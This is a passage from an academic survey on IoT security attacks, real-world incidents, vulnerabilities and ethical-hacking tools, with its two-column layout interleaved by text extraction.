attacker manipulates the function by changing its environment vari- once the users clicks on the “Cancel” or the “X” buttons to close the
ables. On the other hand, there are different SQL injection methods window.
that can be applied [147,149], and they are presented in Table 2. The
Spyware: is a part of the malware family, masqueraded in a (mali-
focus on this type of this attack is due to it being an active method cious) software [155,156] that installs itself on a given device to
used by hackers mainly to target university websites such as the covertly monitor its victims’ online/offline behaviour without their
infamous known cases of Team GhostShell SQL attacks (Oct. 2012, knowledge and permission [157] and gain details about them (E.g
targeting 53 universities), Rasputin SQL attack (Feb. 2017, targeting names, addresses, browsing history, downloads etc). Spyware can act
60 universities), and LulzSec ITA SQL attack (Feb. 2020, targeting 3 as adware by marketing data firms, or can be a Trojan. Such attack
universities) [150]. Further information about SQLi attack types are can degrade a system’s performance, damages the Central Processing
discussed in Ref. [151]. Unit (CPU) capacity, affect the disk usage and cause network traffic
overhead.

Cross-Site Scripting: or XSS is a web application security vulnera-
Trojans: these include two types: Software Trojans (STs) which are
bility based on a malicious code injection by malicious web users. In often disguised as legitimate software employed by cyber-criminals to
fact, recent attacks were able to leverage session IDs by relying on gain access to users’systems, and Hardware Trojans (HTs) which
JavaScripts functions on other websites to inject them into different cause a malicious modification of the circuitry of an integrated circuit
pages. This included online banking, instant messaging and emails. to disable or destroy the entire chip and its components [158]. Once
Therefore, being capable of stealing a user’s session which in turn, activated, Trojans can steal, spy, exploit, implement backdoors
can be used to steal stored web cookies. This allows the attacker to (rootkit) to delete, block, modify, disrupt and modify data [159].
replicate a user’s session on a different machine [152,153]. Another Trojans can take many forms: Trojan-Banker (steal data’s account),
form of XSS is based on the attacker sending HTTP requests at his own Trojan-DDoS (denying service), Trojan-Downloader (down-
will from his victim’s machine, or sending false counterfeited requests load/install new malicious program versions), Trojan-Dropper
relying on the use of an especially sophisticated tool(s). (install viruses), Trojan-FakeAV (fake Anti-Virus), Trojan-Game-

Cross-Site Request Forgery: Cross-Site Request Forgery (CSRF) Thief (steals online gamers’ accounts), Trojan-IM (steals users’ user-
takes advantage of any possible lack of authorisation that is either names/passwords of Skype, Yahoo, Messenger, etc), Trojan-Ransom
absent or weakly employed in poorly designed web applications. The (modify computer’s data as part of ransomware attack), Trojan-SMS
first step of performing this attack, is based on the hacker making the (sending text messages from their victims’ phones), Trojan-Spy
victims run the malicious script through clicking on malicious link (implement keystroke, keep users under surveillance), and
without their knowledge. Therefore, allowing the attacker to use the Trojan-Mailfinder (harvest email addresses).
victims’ saved credentials to perform further attacks on their behalf,
Botnet: bots or zombies tend to exploit IoT devices that suffer from
and without their knowledge. Such attacks usually take place through the same vulnerability [160], and can also be used to launch DoS and
a network request injection relying on the browser of the user, which DDoS attacks by being ordered from a command and control (C&C)
software. Botnets can steal data, send spam, or gain remote access.
Botnets can take many forms including Hybrid Botnets [161], Internet
Table 2
Relay Chat (IRC) botnets [162], Cloud Botnets [163], Peer-to-Peer
Different SQL Injection Attacks that can target database applications servers used
(P2P) botnets [164], Hyper Text Transfer Protocol (HTTP) botnets,
by IoT users.
and Mobile (SMS/Bluetooth) botnets [165], along many other botnet
SQL Injection Types Description types.
Blind Injection Logical conclusions are derived from the answer to a true/
Virus: is designed to target IoT systems and devices by spreading
false question regarding the database from host to host either through human interaction (Trojan, Logic
Logically Incorrect Using different error messages to retrieve information to
Bomb [166,167] etc) or without human intervention (worm) [168].
Queries exploit and inject a given database
Piggy-Backed Malicious queries are additionally inserted into an already Unlike worms, viruses cannot spread or reproduce without human
Queries injected original query interaction, since it is a malicious code or program written to alter the
Stored Procedure Executing database’s built-in functions using malicious SQL way a computer performs. Viruses can be attached to a program, file,
Injection scripts/codes funny images, audio/video files, socially shareable content or docu-
Tautology SQL injection queries injected so they always result in a true
statement
ment, to steal data/passwords, register keystrokes, corrupt files, send
Timing Attack Collecting information by noticing the database response spam, erase data or cause hard disk permanent damage [169]. This
time can also result into having file infection [170]. Infected devices show
Union Query Malicious query joined with a safe query using UNION to get various symptoms including frequent pop-up windows, homepage
other table related information
changes, frequent crashes, and slow performance. Therefore, its

287
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

always important to use trusted/verified up-to-date anti-viruses, frequencies (mainly FM, GSM, 2.4 and 3, 4 or 5 GHz). To overcome
avoid clicking on pop-up advertisements, and use spam filters. this attack, Wireless LANs can be used, along frequency hopping and

Rootkit: is used to gain a remote administrator-level access to a shifting techniques.
computer or network by stealing an administrator password or
Black-hole: packet drop attack or blackhole attack is classed as a
exploiting a system’s (OS, firmware or application) vulnerability denial-of-service (DoS) attack by employing a router that (sometimes
[171]. Rootkits can deactivate/destroy anti-malware software to selectively) relays packets instead of discarding them [187]. Due to
avoid detection and make its tracking extremely difficult. Moreover, the lossy network nature, packet drop attacks are very hard to detect
rootkits can ensure a backdoor access through key logging, or turn a and prevent. Hence, they are frequently deployed to attack wireless
given vulnerable device into a bot. ad-hoc networks. This type of attacks can be mitigated using a Timer
Based Baited Technique presented in Ref. [188].
3.1.3. Network attacks
Byzantine: attacks have total control on the number of authenticated
Poorly secure and non-secure IoT networks including servers, chan- devices before behaving arbitrarily [189]. This type of attacks turns
nels and gateways are vulnerable to various threats and attacks that insider nodes into malicious ones by preventing route establishments,
exploit their security gaps. The most commonly known type of these modifying route selections, and dropping route requests. Therefore,
attacks are as follows: disrupting and degrading the performance of both network and
routing services. Byzantine takes many forms of attacks including

Eavesdropping: is known as a passive interception of communica- Byzantine Wormhole attacks, and Byzantine Overlay Network
tion between two parties and can take many forms such as: sniffing by Wormhole attack, in addition to other attacks that are further dis-
installing a network monitoring software called sniffer, or snooping cussed in Ref. [189].
attack where an eavesdropper passively intercept non-secure or weak
DoS/DDoS: a denial-of-service (DoS) attack prevents legitimate users
communication between two parties to steal their information and from accessing their services through an excessive sending of
credentials via the communication network [172]. To overcome this authentication requests with invalid return addresses [190]. A
attack, avoid public Wi-Fi networks, use firewalls, proxies and Virtual Distributed-Denial-of-Service (D-DoS) compromises multiple systems
Private Networks (VPN). (compromised through a Trojan and turned into bots) before simul-

Replay: are known as playback attacks that are a lower tier versions taneously flooding the victims with a massive incoming traffic from
of a ”Man-in-the-middle attack” where an attacker eavesdrops on a multiple sources. DDoS attacks have many types including: traffic
secure network communication and intercepts it for further repeated attacks, flooding Transmission Control Protocol (TCP) packets,
transmission later on to cause delays or disruption of service. To flooding User Datagram Protocol (UDP) and Internet Control Message
overcome this attack various solutions can be presented such as using Protocol (ICMP) packets, bandwidth attack (sending massive data
timestamps, securing data storage with key update, using security junk), and application attacks (depleting application layer’s
protocols [173], using attentive filtering networks for audio replay resources).
attack detection [174], and using Magnitude and Phase Information
with Attention-based Adaptive Filters [175]. Finally, a penetration testing risk assessment is presented in Table 3

Man-in-the-Middle: (MITM) is an active eavesdropping form where with the appropriate security measures per attack depending on the se-
the attacker impersonates each endpoint to alter, intercept and curity target: ((C)onfidentiality, (I)ntegrity, (Av)ailability and (Au)
directly monitor the communications between two parties and tricks thentication).
them into believing that they are communicating with each other
[176]. Therefore, encrypting communication is required and using a 3.2. Cyber-activity against IoT
mutually a trusted Certificate Authority (CA) between both parties is
a must. Hacking against IoT can take part or even be part of a cyber-activity

Packet Sniffing: intercepts the data through the capture of traffic led by a hacking group or individual(s), either locally, regionally or
using a sniffer software [177] over non-secure channels and reads the globally. As a result, hacking can take many forms, depending on the
unencrypted data. Captured data can be analysed to gain access or motives mentioned earlier, depending on goal, cause and objective. Such
information. To overcome this issue, channels must be secure and cyber-activity, can be cyber-crimes, cyber-terrorism, cyber-warfare, and
data must be encrypted. cyber-espionage, targeting IoT systems including (but not limited to)

Password Cracking: is a cryptanalysis process that aims to crack Medical IoT [5], Industrial IoT (i.e Cyber-Physical Systems [20] and
passwords to recover credentials and gain access to systems (System power-line stations [22] and long range communication [21]), Military
Administration privileges) and data [178]. Password cracking can IoT (i.e Drones/UAVs [23] and robotics [24]).
range between brute force [179] (protected using multi-factor The possible cyber-activities that can benefit from the exploitation of
authentication), dictionary [180] (protected using a passphrase), IoT devices are listed in the following:
Meet-in-the-middle [181] (protected using stronger keys), onli-
ne/offline password guessing [182] (protected using encrypted
Cyber-Crimes: Hackers mainly rely on cyber-theft, cyber extortion,
password form), rainbow-table [183] (protected using salting tech- and skimming [196] in order to steal financial or personal informa-
nique), and birthday [184] (protected using hashing) attacks with tion via IoT systems, computers, devices or insecure browsers to
many commercial/free tools being used and available for this task. target businesses, organisations, installations and sometimes for

Traffic Analysis: intercepts and examines encrypted/unencrypted cyber-bullying purposes against the youth [197]. This was done by
network traffic to recover any useful information (header, message breaching the security measures to intercept data by also targeting
length, repeated patterns, processing time, transmission delay, etc) engines, wikis and blogs by constantly sending empty messages. This
[185]. This renders large, periodic, encrypted and plaintext traffic was mitigated by using adaptive neuro-fuzzy inference systems [198].
under constant watch. To overcome this attack, sophisticated cryp- This concept was adopted by the attackers to carry out various types
tographic solutions are needed, as well as the use of The Onion Router of malware attacks [199]. In fact, cyber-heist is a large scale monetary
(TOR). theft which can be realised by relying on digital devices such as IoT

Wireless Jamming: is used to compromise a secure/non-secure one to perform their cyber-crimes through hacking, with Crime-ware
wireless environment (mainly Local Area Networks (LAN)) [186] by kits [200] including SpyEye [201], Butterfly Bot [202] and Zeus
denying the access and transceiving services to authorized users, by [203] being the most used hacking tools. The most infamous
blocking and jamming all wireless legitimate traffics on all targeted cyber-heist act was MIRAI attack.

288
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Table 3
Security attacks against IoT entities and users with possible security measures.
Attack Targeted Security Security Goals
Goals

Target Type C I Av Au Cryptography Non-Cryptography

Web Attacks Cookies Hijack ✓ X X ✓ Encrypted Connection HTTPS, Secure Websites

Session Hijack ✓ X X ✓ Encrypted Connection Session Key Management, Secure SSL/TLS, HTTPS
Masquerade Attack ✓ ✓ X ✓ Encrypted Communication Code Signing, Execution Prevention, File/Directory
Permissions
Buffer Overflow X X ✓ X – Bound Checking, Randomized Memory Layout
Website Spoofing ✓ X ✓ X – Secure Websites, Web Filtering, Anti-Phishing Training,
Netcraft
Malicious Code ✓ ✓ X X – Proper Secure Coding
Injection
SQL Injection ✓ ✓ ✓ X Secure Coding Input Validation
Cross-Site Scripting ✓ ✓ ✓ X Secure Coding Filter Input/Output, Security Policy
Cross-Site Request ✓ ✓ X X Read-only GET requests Cross-Site Request Forgery
Forgery
Application Scareware ✓ ✓ X ✓ – Anti-Virus, Anti-Ransomware, Awareness
Attacks Cookies Hijack ✓ X X ✓ Encrypted Connection HTTPS, Secure Websites
Spyware ✓ X X X – Anti-Spyware, Updated Software Patches, Trusted Third
Parties
Trojan ✓ ✓ ✓ X – Anti-Virus, Updated Software Patches, Awareness
Botnet ✓ ✓ ✓ X – Anti-Malware Software, Updated Systems, Disabled Unused
Ports, Awareness
Virus ✓ ✓ ✓ X – Anti-Virus, Firewalls, Awareness, Updated Systems
File Infection ✓ ✓ X X – Anti-Virus, Prevented P2P File Sharing, IDS, Awareness
Rootkit ✓ ✓ ✓ ✓ – Advanced Anti-virus, Awareness, Updated Systems, IDS/IPS
Network Attacks Eavesdropping ✓ X X X Encrypted Data & Communication Personal Firewall, Proxies, VPN
Replay X X X ✓ Encrypted Data & Communication VPN & Personal Firewall
Man-in-the-Middle ✓ ✓ X ✓ Digital Certificate & Encrypted VPN, Strong Authentication & Tamper Detection
Communication
Packet Sniffing X X ✓ X PKI [191] VPN, TLS & SSL [191]
Password Cracking ✓ X X ✓ Strong Hashing Strong Multi-Factor Constant Password Changing, Strong
Passwords
Traffic Analysis X X ✓ X Encrypted SIP [192], Secure Network Filtering, Network Monitoring & Analysis
Communication
Wireless Jamming X X ✓ X Encrypted Channels, Secure FHSS and DSSS [193]
Communication Lines
Black-hole X X ✓ X ECC [194] HMM [195], R-AODV [194]
Byzantine X X ✓ ✓ – Secure Endpoints, Advanced Firewalls, IDS/IPS, Traffic
Monitoring/Analysis

Cyber-Espionage: became another dangerous emerging field seri- motives are usually either religious-based or racial-based via the
ously targeting IoT, especially when a Stuxnet worm attack targeted spread of hate, terror, fear and/or racism through hacking. This was
the Iranian nuclear power grids [204], followed by other similar at- mainly done through defacing/hacking websites, or mostly
tacks (i.e Flame, Duqu and Gauss variants) [205]. Another aspect of DoS/D-DoS attacks [212].
cyber-espionage. Moreover, industrial cyber-espionage [206] took
place in 1997, where engineers disclosed sensitive business infor- In fact, terrorists are now also relying on online methods to perform
mation to the company’s competitors. In fact, such attack was their online cyber-attacks in a cheaper but much more effective way to
revealed through received emails and faxes. The engineer was express or impose extreme politico-religious views [213–215].
accused of industrial espionage and was sentenced for around two
and a half years in jail. A large spy network called GhostNet [207] was
Cyber-Warfare: or information dominance or/and information
revealed by Canadian researchers in 2009. It was responsible for more warfare [216], which became a new type of cyber-war and part of an
than a thousand computer intrusions in more than 103 countries, electronic warfare being waged against sensitive IoT systems and
gaining unauthorised access, and compromising different devices. domains. This was achieved through cyber-space against different
Operation Shady RAT is the most infamous cyber-espionage case that countries [217], in order to cripple their cyber-ability and capability
affected more than 70 companies and organisations since 2006 [208]. and smart infrastructure with a group of cyber-army or cyber-warriors
It was spread through an e-mail with a malicious link attached to it as [218,219]. A global cyber-war [107] was already waged against
a self-loading remote-access tool, or Remote Access Trojan (RAT). ISIS/ISIL in Ref. [220]. This war managed to decisively defeat their
Thus, gaining unauthorised access to legal entities and sensitive data. cyber-caliphate online, and freezing their online activities. Another
This is similar to the cases of studies of Smallcase, Derusbi, and Sakula attack was led by Russia against Georgia and Estonia in 2007–2008,
RATs [209]. by sending multiple waves of D-DoS attacks, as well as against

Cyber-Terrorism: Due to the availability of hacking tools and Ukraine following the Russo-Ukraine conflict since 2014 [221],
internet with high speed real-time data transmission, and the easiness which was renewed in January, February and March 2022. Therefore,
to obtain laptops, computers, and mobile phones at low prices, it crippling their online available services [222,223]. In fact,
became a source of attraction for terrorists with psychological effects cyber-warfare can be part of the electronic warfare domain to ensure
[210]. As a result, terrorists started using it as a new emerging type of the Battlefield’s Situational Awareness (BSA) using Cyber Electronic
cyber-warfare, known as the asymmetric cyber-warfare, in order to Warfare (CEW) [224,225]. One example is the ongoing cyber-war
lead cyber-attacks against IoT systems mainly belonging to Western between the North Atlantic Treaty Organisation (NATO) members
governments and military installations [211]. Their extremist

289
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

and both Russia and China [226,227], especially in the Balkans leads to stealing online money as much as possible, in the least
[228]. amount of time.

Enterprises: are also prone to cyber-attacks led by hackers to disrupt
3.3. Targeted IoT fields their services and interrupt them. In fact, smaller enterprises are the
most enterprises vulnerable to attacks by hackers. By quantifying a
The new adaptation and the widespread use of the internet and given risk [235], financial losses managed to reach up to more than
recently the IoT was based on digitizing data and records that are stored $445 Billion yearly, which is a quite high number.
and processed by cloud services. This gave hackers the opportunity to
Governments: are mainly targeted either by hacktivists, cyber-
launch cyber-attacks against numerous IoT sectors such as banks, en- terrorists [236], or even cyber-espionage attacks. Hacktivists
terprises, governments, military installations, hospitals, and individuals. perform their attacks as a form of protest, relying on hacking as a tool
in order to make a clear statement. However, cyber-espionage is led

Organisations: any national/international organisation or small/ by foreign rival governments against other governments by relying on
medium enterprise is also prone to a wide range of cyber-attacks cyber-intelligence agencies. In fact, it is a part of information gath-
[229], which can severely impact their operational performance ering in order to lead a much more sophisticated cyber-attacks against
[230]. These cyber attacks are based on targeting the organisations’ smart infrastructure or even affect election polls [237,238].
devices, relying on phishing and spear-phishing attacks [231,232].
Hospitals: also became the perfect target for hackers in order to steal
These attacks can infect a given organisation device with a malware patients’ private data and sell them to malicious parties. In May 2017,
capable of recording keystrokes, or injecting a spyware, or a Trojan the National Health Service (NHS) came under a WannaCry ran-
horse (RAT), which turns the devices into botnets, or enables somware attack, led by North Korea’s Cyber-Unit 180 (Lazarus)
advanced access privileges. [239], before establishing a security operations center and investing £

Banks: The most common attacks against banks can be based on 250 000 to raise awareness and train NHS employees. In January
hitting the availability of a given bank and preventing legitimate 11th, 2018, Hancock Regional Hospital in Indianapolis was infected
users from accessing and using the available services. This can have by malware via an e-mail, known as a phishing attack [239]. Hackers
devastating effects on systems and people alike, targeting and locked the hospital’s computer systems and demanded a ransom in
compromising both systems and data confidentiality, integrity or/and Bitcoin crypto-currency. Therefore, luring the hospital to pay $55,000
availability. Moreover, cyber-heist [233,234] can also occur. This as a ransom [240].

Fig. 5. Proposed cyber-classification taxonomy.

290
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Military Websites: A new emerging technique has two main aspects, running on Equifax’s web servers was exploited due to a security
cyber-warfare [241,242] (i.e Russian-Ukraine case [243], or failure caused by Equifax’s administrators not applying least privilege
cyber-terrorism [78,91]. It can also take a secondary aspect by being controls. After accessing the web server, the attackers successfully
part of a hacktivism campaign led by protesters (i.e anonymous) [74], sneaked into the database, held and siphoned private information of
or led by state-sponsored hackers such as the Iranian and 143 million consumers including social security names, addresses,
Iranian-backed hackers, state-sponsored proxies (i.e Hezbollah [244]) dates of birth, social security, and credit card numbers, costing
and the Syrian Electronic Army group [245] against a given (US/Is- around $3 billions to sort the breach. Hence, the importance of a zero-
raeli) military action [246]. Therefore, the military seems to be a trust approach to Privileged Access Management (PAM) [249].
recent cyber-target by different hackers [247], where bits and bytes
Exploit - CVE Variants Incidents: CVE variants were prone to
are replacing bullets and bombs in the cyber-physical world. various exploits [250]. In 2020, Microsoft successfully managed to
detect attacks that leveraged vulnerabilities in the Microsoft Ex-
Finally, this paper summarizes them in Fig. 5. change Server. These attacks were classified as Zero-Day, and were
tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858,
4. Real-case IoT-Related events and CVE-2021-27065. The exploitation took place when attackers
managed to successfully inject malicious codes into the resources
In this section, we present some real-time security events that took used in the Exchange Offline Address Book (OAB) service [251,252].
place against IoT servers, gateway, and end-devices, including real case
Exploit - CVE-2020–1472-Zerologon: was a critical Microsoft
vulnerability and database exploit, along with real cyber attack events, vulnerability which allowed a attacker to escalate privilege to the
and we highlight some possible security measures. highest level without having any credentials. This was done when the
attacker managed to reset the password with or without reestablish-
ing the original password [253].
4.1. Real case vulnerability exploitation
Exploit - CVE-2020–0688 Incident: was initially discovered on
February 26, 2020, when the credentials of an already compromised
Several real case studies are mentioned and briefly discussed to account were leveraged to authenticate to Outlook Web Access
highlight how such vulnerabilities were exploited to conduct cyber- (OWA). The credential harvesting attack was achieved by either
attacks including: password guessing or poor password policy, allowing the attacker to
exploit the Exchange Control Panel (ECP).

Adobe Flash Incident: in 2013, Adobe suffered a breach [248]. In
Exploit - 05–2022–0438.doc Incident: was revealed on May 30,
2015, the Adobe Flash came under attack. The exploited vulnerabil- 2022, which is a zero-day flaw in Microsoft Office that allows the
ities were zero-day types including mainly CVE-2015-5119, ability to achieve arbitrary code execution on affected Windows
CVE-2015-5122 and CVE-2015-5123. systems. The word document was uploaded to VirusTotal from an IP

Equifax Data Breach Incident: took place in March 2017, where an address in Belarus but was discovered. The exploit uses Word’s
unpatched Apache Struts vulnerability coded CVE-2017-5638

Fig. 6. Vulnerability & Security Solutions at different IoT’s Components.

291
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

external link to load the HTML file (”RDF842l.html”), then the ’ms- confidentiality, integrity or/and availability of a given IoT system, which
msdt’ scheme to execute PowerShell code. Its severity level is similar drastically affect its performance.
to the CVE-2021-40444 exploit.

Lack of Access Control Mechanisms: The lack of the right access
In fact, it is also important to highlight the yearly increase in number control mechanisms can make any IoT system prone to various types
of cyberattacks, which according to CISCO’s 2021 Cybersecurity Threat of attacks and vulnerabilities. In many cases, employees are given
Trends report, (Spear) Phishing attacks were responsible for more than access privileges to perform more than their intended task(s), along
80% of security incidents and 90% of data breaches. Increasing the year- with being left with these privileges even after their task(s) have been
over-year in phishing attacks by 400%. On the other hand, ransomware performed. However, in other cases, physical access control is another
attacks increased by 48%, with a 17% increase between 2020 and 2021 concern, since locks can be easily broken and keys can be easily ob-
[254,255]. tained. Therefore, the adoption of biometric access control mecha-
nisms [259,260] is important and deserves a new aspect of attention,
4.2. Vulnerability assessment especially since many biometric features can be imitated [261].

Third-Party Applications: are usually untrusted or semi-trusted
Untested IoT systems tend to be more vulnerable to various types of applications that are used for a specific task or to fix a given IoT
attacks such as the ones presented above, which puts them at a higher system, such as debugging processes. Such applications can be rogue
risk of being targeted due to their exploitable security gaps. Therefore, it applications that can be used to gain unauthorised access to the
is important to assess vulnerabilities before specifying the risk(s) asso- network, inject malicious codes or eavesdrop/spy on the transmitted
ciated with them. message to retrieve confidential information.
In order to evaluate a given vulnerability, it is highly recommended to
Backdoor Programs: are typically set by vendors for fast access to
assess it first starting by identifying it. In Ref. [256], Votipka et al. were any given IoT system. However, they can also open the door for
among the first to conduct a study and a comparison analysis between hackers who exploit them as a weakness to gain an illegal covert
ethical hackers and pen testers. The analysis included ways to scan, find access. In fact, hidden backdoors are intentionally-created computer
and discover vulnerabilities. Also, the paper included how testers and security vulnerabilities, which allow the covert installation of a pro-
hackers develop their own skills, knowledge and experience, as well as gram or the execution of a given code to provide remote access to a
the tools they use. Moreover, the authors provided their own recom- given system via the exploited device.
mendations to support and improve security training for testers, along
Lack of Patching/Updates: (OS) systems must always be updated to
with better communication between ethical hackers and developers, avoid patching vulnerabilities in older versions. Otherwise, they can
where hackers were also encouraged to participate. be easily exploited. This, especially recently, has proven to be a main
In fact, there is a huge number of tools for Vulnerability Assessment vulnerability such as the case of Log4j variant that has exploited and
Penetration Testing (VAPT) [257] that can be used to perform penetra- keeps on exploiting thousands of devices. This leaves not only OSs
tion testing and vulnerability assessment for ethical hacking purposes. vulnerable, but also systems and devices that rely or run on this
Different papers mentioned various types of vulnerability assessment and platform vulnerable to older and much newer exploits such as zero-
penetration testing tools such as [257,258]. However, we shall focus on day attacks [262]. Therefore, systems, devices and OSs updates is a
the main VAPT tools, which are typically used during ethical hacking must [263].
training.
Program Errors & Unknown System Bugs: these issues are usually
Hence, Table 4 presents a summary of the most frequently used caused by coding errors or software bugs, which can be exploited to
Vulnerability Assessment Penetration Testing (VAPT) and Network install a given malware (mainly Trojan or worm) to establish access to
Vulnerability Scanning (NVS) tools in order to secure IoT systems from a given device or for reconnaissance purposes. In fact, they can also be
any exploits and protect them from any attack. related to security, software or programming bugs especially when
different systems are communicating with each other. Such bugs are
4.2.1. IT security vulnerability usually vulnerabilities that are exploited to gain or maintain access
IT security (ITSec) vulnerability, once exploited, can cause a serious over a given system.
blow to both IoT systems and users/clients since they target the
Unknown System Vulnerabilities: are usually exploited by zero-day
attacks such as the recent case of the Log4j (i.e CVE-2021-44228,
CVE-2021-442288, CVE-2021-45046 variants) [264] that caused a
Table 4
Vulnerability Assessment Penetration Testing (VAPT) & Network Vulnerability
cyber-security flaw (December 2021) since such vulnerabilities are
Scanning (NVS) tools that can be employed on IoT entities (end devices with OS only known to the attacker, and they are very difficult to prevent.
and/or servers), in addition to the user’s desktop/mobile. Hence, the importance of adopting penetration testing.

Hardware Vulnerability: is related to the IoT hardware equipment
Name Type Description
that are fragile and not tamper resistant, making them more prone to
Kali Linux VAPT/ Various collection of different tools destruction, physical tampering, damage or damage beyond recovery.
NVS
Paros Proxy VAPT Web vulnerabilities scanner
Other vulnerabilities may cause systems to overheat, melt down, burn
Core Impact VAPT Vulnerability exploitation & Scanning down or even explode. Therefore, it is also important to check the
Parrot Security OS VAPT Designed for vulnerability assessment and quality of the hardware and hardware equipment in-use, and ensure
mitigation, penetration testing, computer that their use will be in a safe, secure and suitable environment.
forensics and anonymous web browsing

Poor IT Skills: are usually caused by the lack of training of IT security
Nexpose VAPT/ Vulnerability Scanner & Vulnerability
NVS Management Life-cycle personnel who would have limited experience and skills. Therefore,
Microsoft Baseline NVS Identify any missing service packs, security continuous training must be maintained to ensure a high level of
Security Analyzer patches, and security misconfigurations, readiness and a low risk of failure.
(MBSA) scans IP addresses, scan weak passwords, or
Accidents: can be intentional as the ones caused by rogue employees,
SQL administrative vulnerabilities
Retina CS Community NVS Finds network vulnerabilities, configuration
or unintentional due to lack of employees’ training. The associated
issues, and missing patches, provides free errors can be minor, but sometimes they can be major causing the
scanning and patching for 256 IPs (max), system to crash and thus, affecting its availability. Hence, account-
supports vulnerability scanning in mobile ability must be enforced, while creating a team spirit among co-
devices, servers, and web applications
workers to avoid mistreatment and lack of performance.

292
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Lack of CERT: Described as the lack of training that the IT security essential to protect servers and storage areas from any possible and
staff undergoes in order to become part of the “Computer Emergency unwanted physical access to prevent any physical/logical damage.
Response Team” (CERT) [265]. In fact, it is highly recommended to
address to such a vulnerability and threat accurately, effectively, In brief, all these vulnerabilities are summarised in Fig. 6, along with
efficiently, and on time. their most suitable solution.

4.2.2. Technical & operational vulnerability 5. Ethical hacking

Operational vulnerabilities requires constant scanning to assess their
exploitable vulnerability level [266], as well as to detect and identify the In the era where ethical hacking is gaining a great fame and popu-
Advanced Persistent Threat (APT) strategy [267]. However, it is impor- larity with an increased adoption and appliance to test the IoT security, it
tant to identify and classify them first. is important to identify its life-cycle. Moreover, the tools used in its life-
cycle events must also be highlighted in order to know how the process

System Privileges: admin privileges that are not properly assigned, proceeds.
or exploited access controls, or unchanged defaults can also be mis-
used and exploited, especially by insiders or leaked by whistle-
5.1. Ethical hacking life-cycle
blowers.

Resource-Constrained Devices: especially IoT devices with limited
Ethical hacking life-cycle is closely similar to normal hacking life-
battery life, or that are resource-constrained in terms of memory and
cycle with only a slight difference based on the fact that ethical
computational power require more a much more specialised
hackers aim to cause no harm nor damage to a given IoT server, system,
compatible version to rely on in order to operate [268]. This also
device or domain unlike black-hat hackers (see Fig. 7 and Fig. 8). In fact,
requires a special security measures being adopted to ensure an active
it is further illustrated in Fig. 8.
security measure in a timely manner and without affecting their
performance.

Reconnaissance: The reconnaissance phase is based on the use of the

Vendors Software: In many cases, vendors employ software without
available processes and techniques that can either be used covertly, or
taking into consideration the security aspect of its given design,
deliberately in order to gather information about IoT systems or/and
especially when left unpatched or misconfigured [269]. Moreover,
users via open or less-secure IoT servers or/and ports through
software is either employed with no security protection, or with very
network mapping. This includes IoT-related details such as the Wi-Fi/
weak security protection, which compromises the software [270]. In
network in use, type of connected machines/devices, along their
fact, using sandboxing can be a good practice for an IoT system’s poor
software, hardware and Operating System (OS).
or misconfiguration [271].

Scanning: aims to discover any IoT-related security or/and vulner-

Untested Applications: Many applications remain untested and
ability gap(s) that can be used to conduct the attack. This includes the
unevaluated to check their security and vulnerability levels. There-
search for open or/and unused open ports, live hosts, devices, systems
fore, these applications are left unevaluated without being deemed as
and services, along configuration/security vulnerabilities in firewalls,
either secure or non-secure. Thus, leaving them prone to various at-
Intrusion Detection Systems/Intrusion Preventing Systems (IDS/IPS),
tacks types including surveillance attacks.
as well as routers and switches [188,272].

Hardware Components: Many hardware components lack of the

Gaining Access: is based on gaining unauthorised but simulated
necessary physical protection and security against any possible
access to an IoT system, application, server or device. This is achieved
physical attack based on an unauthorised access. Therefore, it is
by relying on various penetration testing tools and techniques to

Fig. 7. Proposed general taxonomy for ethical hacking process.

293
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Fig. 8. Appliance of the hacking concept on IoT-related domains and components, where ethical hackers stop at gaining access.

virtually break into the system and bypass the security measures.
Maintaining Access: Once access into a given IoT system, device, or
Thus, targeting the authorisation or authentication of a given IoT server is gained using tools [110], the system’s resources can be
system. exploited by seeking other common vulnerable devices [273,274].

Table 5
Web-based Ethical Hacking tools that can be employed with the IoT Web-applications servers.
Tools Definition Description Operating System(s) Tasks Type Programming
Language

Acunetix Web- Web Application Security RedHat, Mac, End-to-end web security scanning Commercial Cþþ
based Scanner Windows-based
Netsparker Web- Hacking Web Web-servers, Accurate/automated application security tester Commercial JavaScript, Ajax
based Applications application server-
based
Sqlmap Web- SQL Injection CentOS, Red Hat, Detects and exploits SQL injection flaws Open Python
based Linux, Windows- Source
based
Nikto Web- Web Server Scanning Unix, Mac, Linux, Hacks web servers, Scans for dangerous files, Open Perl
based Tool Windows-based suspicious/outdated versions Source
Burp Suite Web- Web Vulnerability Mac, Linux, Windows- Web vulnerability scanner and web application Commercial Java, Python, Ruby
based Scanning based security
OWASP ZAP Web- Web Application Security Mac, Linux, Windows- hijacks sessions, manipulates passing traffic, tests Open Java
based Scanner based the security of web applications Source
Recon-ng Web- Web Reconnaissance Linux-based Used for quick and efficient web-based Open Python
based Framework reconnaissance Source
Invicti Web- Web Application Security Linux, Windows- Detects SQL Injection, XSS and other Commercial Cþþ
based Scanner based vulnerabilities
Fortify Web- Dynamic Application Web-servers, Identifies security vulnerabilities, informs on Commercial C/Cþþ, C#, VB.NET,
WebInspect based Security Testing application server- vulnerability trending, compliance management, and ASP.NE
based and risk oversight
Sboxr Web- Web Application Web-servers, Customises security scanners, detects false Open- Python, Ruby, C# or
based Vulnerability Testing application server- positives/negatives Source VB.NET
based
Uniscan Web- Web Application Linux-based Performs stress test, web or server fingerprinting, Open Perl
based Penetration Testing Tool dynamic or static test option Source
Ping Utility Web- Ping Service Scanner Linux, Windows- Pings to any IP or domain and gives their Open HTML
based based approximate geographical location Source
OUILookup Web- MAC Address Vendor Linux, Windows- Easy to use, allows partial MAC address search Open NodeJS, PHP, Python
based Lookup Tool based Source

294
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

Security Reports: following the successful completion of the previ-
Capacity Challenges: Another challenge is performing the necessary
ous phases, a security report is presented to show the main systems’ penetration testing in order to evaluate the level of security and im-
and personnel’s vulnerabilities and how they were exploited or can be munity of a given IoT system or organisation against cyber-attacks,
